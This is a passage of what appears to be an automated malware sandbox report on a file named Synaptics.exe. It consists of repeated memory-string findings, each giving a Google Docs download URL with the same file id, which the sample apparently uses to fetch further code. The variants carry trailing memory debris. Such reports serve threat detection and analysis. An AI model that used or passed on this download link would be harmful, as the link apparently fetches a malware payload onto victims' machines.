                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goo:
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.jq
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.net
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.q
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.xlsx
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/7
                                      Source: Synaptics.exe, 00000002.00000002.2510648503.00000000193FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/Z
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/_
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/d3
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/fv_?
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0(
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download02e.
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0:#
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0pg
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1/
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1?
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2h
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2o
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3-
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download30?
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3d
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4=
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4I
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download50
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download79
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7=9_)
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7Z
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7i
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2503903796.0000000014F3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.0000000007073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8k)
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8zP
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9-
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download92
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download97g_l
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9P
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9f
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:?
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:g
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;~QX
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=1
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=d
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?8
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?h
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?o
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA-
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA1
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAd
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAppDa1wG_o
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB.
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB4/
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB6
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBe
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC:
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCH
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDa
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDene
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetx
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1770138974.000000000543D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE0
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE9g_
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEi
